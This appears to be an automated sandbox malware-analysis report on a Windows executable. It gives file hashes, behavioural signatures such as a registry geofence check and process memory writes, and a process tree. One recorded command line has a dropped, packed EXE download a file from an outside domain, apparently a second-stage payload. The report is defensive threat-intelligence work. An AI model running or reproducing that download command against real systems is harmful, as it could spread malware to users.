Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05/03/2024, 04:29
Behavioral task
behavioral1
Sample
b3c826c8e7de52b473258d54d67b528e.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
b3c826c8e7de52b473258d54d67b528e.exe
Resource
win10v2004-20240226-en
General
-
Target
b3c826c8e7de52b473258d54d67b528e.exe
-
Size
83KB
-
MD5
b3c826c8e7de52b473258d54d67b528e
-
SHA1
dac2de8157e88c90257a255e8840fa661897e1a7
-
SHA256
5ec3a4f34c759cc44406d8402bcb640667c80da262e6811ff95402e2b48a0458
-
SHA512
0a99c1b7711877cad92fa538db9a09f5eb36ea5c28885eb6a841d21cc32e7681f4da1b6b91e0c201dc82479b0c8d99ed3516fc978a8ecf2d687ecc5c3bc3c4a3
-
SSDEEP
1536:0VmNBnskjNwF4mchK5RF12Ma0gRke7jbXOwzWSP1HdPI88i2nJy+wZm:rN9NdmxP8RkCHBvPpmi2ncbs
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation b3c826c8e7de52b473258d54d67b528e.exe -
Executes dropped EXE 1 IoCs
pid Process 2200 A3A2B-tmp.eXe -
resource yara_rule behavioral2/files/0x0007000000023221-4.dat upx behavioral2/memory/2200-11-0x0000000000400000-0x0000000000424000-memory.dmp upx behavioral2/memory/2200-14-0x0000000000400000-0x0000000000424000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3044 wrote to memory of 2200 3044 b3c826c8e7de52b473258d54d67b528e.exe 88 PID 3044 wrote to memory of 2200 3044 b3c826c8e7de52b473258d54d67b528e.exe 88 PID 3044 wrote to memory of 2200 3044 b3c826c8e7de52b473258d54d67b528e.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\b3c826c8e7de52b473258d54d67b528e.exe"C:\Users\Admin\AppData\Local\Temp\b3c826c8e7de52b473258d54d67b528e.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Users\Admin\AppData\Local\Temp\A3A2B-tmp.eXe"C:\Users\Admin\AppData\Local\Temp\A3A2B-tmp.eXe" http://downgosoft.com/drv32.data "C:\Users\Admin\AppData\Local\Temp\A3A2B-tmpa"2⤵
- Executes dropped EXE
PID:2200
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5a6ef8e1067dae3cf7537712443bf3b77
SHA1204b8a6402b415533540d0c2659c5722a21da8be
SHA2562917964e199063cb0cd0bced5d1f7846edcb810fe02fff8f0b1dd053746cf229
SHA5129662f18208b8a6c27a29e496b75d24ef9a910c20cd458fe8ea58458986253d3ff0a82e349cbfa804b52b3dd0913d995e737f740f48f1a16b8d2ff908ee9cc14a